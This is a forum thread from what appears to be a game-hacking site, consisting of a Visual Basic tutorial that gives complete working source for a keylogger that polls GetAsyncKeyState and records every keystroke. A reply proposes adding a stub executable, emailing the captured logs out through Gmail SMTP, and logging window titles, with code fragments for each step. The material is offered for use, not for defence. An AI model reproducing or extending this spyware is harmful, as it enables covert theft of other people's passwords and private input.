Skip to content
MPGHThe Dark Arts
/
RegisterLog in
Forum
Community
What's NewLatest posts across the boardTrendingHottest threads right nowSubscribedThreads you follow
Discussion
GeneralIntroductionsEntertainmentDebate FortFlaming & Rage
Board
News & AnnouncementsMPGH TimesSuggestions & HelpGiveaways
More Sections
Art & Graphic DesignProgrammingHackingCryptocurrency
Hacks & Cheats
Games
ValorantCS2 / CS:GOCall of Duty / WarzoneFortniteApex LegendsEscape From Tarkov
+14 moreLeague of LegendsGTA VMinecraftRustROTMGBattlefieldTroveBattleOnCombat ArmsCrossFireBlackshotRuneScapeDayZDead by Daylight
Resources
Game Hacking TutorialsReverse EngineeringGeneral Game HackingAnti-CheatConsole Game Hacking
Tools
Game Hacking ToolsTrainers & CheatsHack/Release NewsNew
Submit a release →Share your cheat, tool, or config with the community.
AINEW
AI Tools
General & DiscussionPrompt EngineeringLLM JailbreaksHotAI Agents & AutomationLocal / Open Models
AI × Gaming
AI Aimbots & VisionML Anti-CheatGame Bots & Automation
Create
AI Coding / Vibe CodingAI Art & MediaAI Voice & TTS
The AI frontier →Where game hacking meets modern machine learning. Jump in.
Marketplace
Buy & Sell
SellingBuyingTradingUser Services
Trust & Safety
Middleman LoungeMarketplace TalkVouch Copy Profiles
Money
Cryptocurrency TalkCurrency ExchangeWork & Job Offers
Start selling →List accounts, services, and goods. Use the middleman to trade safe.
MPGH The Dark Arts

A community for offensive security research, reverse engineering, and AI.

Community

ForumMarketplaceSearch

Account

RegisterLog in

Legal

Privacy PolicyForum RulesHelp & FAQ
© 2026 MPGH · All rights reserved.Built by the community, for the community. For educational purposes onlyContent is shared for security research and education — we don't condone illegal use. You're responsible for complying with applicable laws. Use at your own risk.
Home › Forum › Programming › Visual Basic Programming › {tut} How to make simple key logger

{tut} How to make simple key logger

Posts 1–5 of 5 · Page 1 of 1
SI
sigmahero
{tut} How to make simple key logger
Im going to show you how to make a very simple key logger

Add the folowing to a form
____________________

1.Timmer
2.Text box(multi line) cover entir page with ith

Step2.

Make the timer enabeled and with intervels of 1

step 3
Select all code in the form deleate and copy and past this

Public Class Form1
Dim result As Integer
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer


Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

End Sub

Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
For i = 1 To 255
result = 0
result = GetAsyncKeyState(i)
If result = -32767 Then
TextBox1.Text = TextBox1.Text + Chr(i)
End If
Next i

End Sub
End Class
Now your finished
#1 · 16y ago
PI
Pixipixel_
It's better with a good Stub
Code:
FileOpen(1, Application.StartupPath & "\Stub.exe", OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
& it send the rapport in your gmail
Code:
SMTP.Port = 587
        SMTP.EnableSsl = True
If you want the vurrent window title it's
Code:
If title <> GetActiveWindowTitle() Then
etc..
#2 · 16y ago
SI
sigmahero
i know this is just a simple one
#3 · 16y ago
XG
XGelite
now will have keyloggers everywhere! lol
#4 · 16y ago
sora295
sora295
how am i suposed to use this?
#5 · 16y ago
Posts 1–5 of 5 · Page 1 of 1

Post a Reply

Similar Threads

  • *Tut* How To Make A Simple NotepadBy u1111u in Programming Tutorials
    2Last post 16y ago
  • [TUT]How to make a simple[Closed]By Takari in Visual Basic Programming
    17Last post 16y ago
  • [TUT]How to make a simple Auto Clicker!By Takari in Programming Tutorials
    24Last post 15y ago
  • [TUT]How to make a Simple Auto Clicker!By DeathHunter in CrossFire Hack Coding / Programming / Source Code
    22Last post 16y ago

Tags for this Thread

None